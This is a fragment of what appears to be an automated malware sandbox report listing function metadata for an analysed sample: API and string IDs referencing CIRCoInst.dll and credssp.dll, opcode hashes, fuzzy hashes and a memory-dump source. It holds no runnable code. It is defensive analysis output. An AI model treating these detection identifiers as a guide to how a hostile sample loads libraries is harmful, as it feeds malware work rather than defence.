                                                          • API ID: AddressProc
                                                          • String ID: CIRCoInst.dll$Nqt
                                                          • API String ID: 190572456-2116923253
                                                          • Opcode ID: d85a9573aca781bdfeb3b25efdb9e441028f3b7cf45b63f4bb27824d34f02643
                                                          • Instruction ID: ad89369555c84550e432f4b56c4b254ad89f417958448035aef1db971efee374
                                                          • Opcode Fuzzy Hash: d85a9573aca781bdfeb3b25efdb9e441028f3b7cf45b63f4bb27824d34f02643
                                                          • Instruction Fuzzy Hash: 2C114C78E14305ABCB00DFA9E8D1ADDBBB0FF2C320B50807AA959D7362D7740945DB09
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004A27F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: credssp.dll$Nqt
                                                          • API String ID: 190572456-1865208935
                                                          • Opcode ID: ae669b5b9cd43ccb5fc88142bf8475d31f4b0b0f21b6055983b09d8ad5a6587c
                                                          • Instruction ID: 8bb6dfcaf604ffe223437a973d084799d87f54d7c008f84643bd630154602d2f
                                                          • Opcode Fuzzy Hash: ae669b5b9cd43ccb5fc88142bf8475d31f4b0b0f21b6055983b09d8ad5a6587c
                                                          • Instruction Fuzzy Hash: 5C018F74A00706AFCB00EF69E894ADD7B71EF79310F18917ED044E7365DAB80409EB0A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%